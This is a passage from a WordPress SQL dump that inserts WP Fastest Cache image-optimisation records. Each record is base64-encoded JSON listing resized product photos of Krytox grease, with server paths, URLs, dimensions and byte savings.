ljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI0MCwiaWQiOjM3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNDUsImlkIjozNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjIxMCwidGltZSI6MTQ4MzU4NzI0OCwiaWQiOjM3Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6OTcsInRpbWUiOjE0ODM1ODcyNTAsImlkIjozNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNTIsImlkIjozNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNTUsImlkIjozNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNTcsImlkIjozNzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuOC1rZy1jYXJ0cmlkZ2UtMzAwLWRwaS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC44LWtnLWNhcnRyaWRnZS0zMDAtZHBpLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjgta2ctY2FydHJpZGdlLTMwMC1kcGktNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNTksImlkIjozNzZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30227, 375, 'wpfc_optimisation_reduction', '273457'); 
INSERT INTO `wp_postmeta` VALUES (30228, 375, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLmpwZyIsIndpZHRoIjoxNTAwLCJoZWlnaHQiOjE1MDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoyNzMzMDIsInRpbWUiOjE0ODM1ODcyNjgsImlkIjoiMzc1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNzAsImlkIjozNzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTgwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MjczLCJpZCI6Mzc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI3NSwiaWQiOjM3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyNzcsImlkIjozNzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0wLjUta2ctUmVkLVRvcC0zMDAtZHBpLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3MjgwLCJpZCI6Mzc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI4MiwiaWQiOjM3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODcyODQsImlkIjozNzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTAuNS1rZy1SZWQtVG9wLTMwMC1kcGktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjE0MywidGltZSI6MTQ4MzU4NzI4NywiaWQiOjM3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI4OSwiaWQiOjM3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI5MSwiaWQiOjM3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI5MywiaWQiOjM3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI5NSwiaWQiOjM3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMC41LWtnLVJlZC1Ub3AtMzAwLWRwaS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzI5OCwiaWQiOjM3NX1d'); 
INSERT INTO `wp_postmeta` VALUES (30229, 374, 'wpfc_optimisation_reduction', '200490'); 
INSERT INTO `wp_postmeta` VALUES (30230, 374, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0uNS1vei10dWJlLTMwMC1kcGkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLS41LW96LXR1YmUtMzAwLWRwaS5qcGciLCJ3aWR0aCI6MTUwMCwiaGVpZ2h0IjoxNTAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0uNS1vei10dWJlLTMwMC1kcGkuanBnIiwicmVkdWN0aW9uIjoxOTkzNzYsInRpbWUiOjE0ODM1ODczMDYsImlkIjoiMzc0In0seyJmaWxlIjoiXC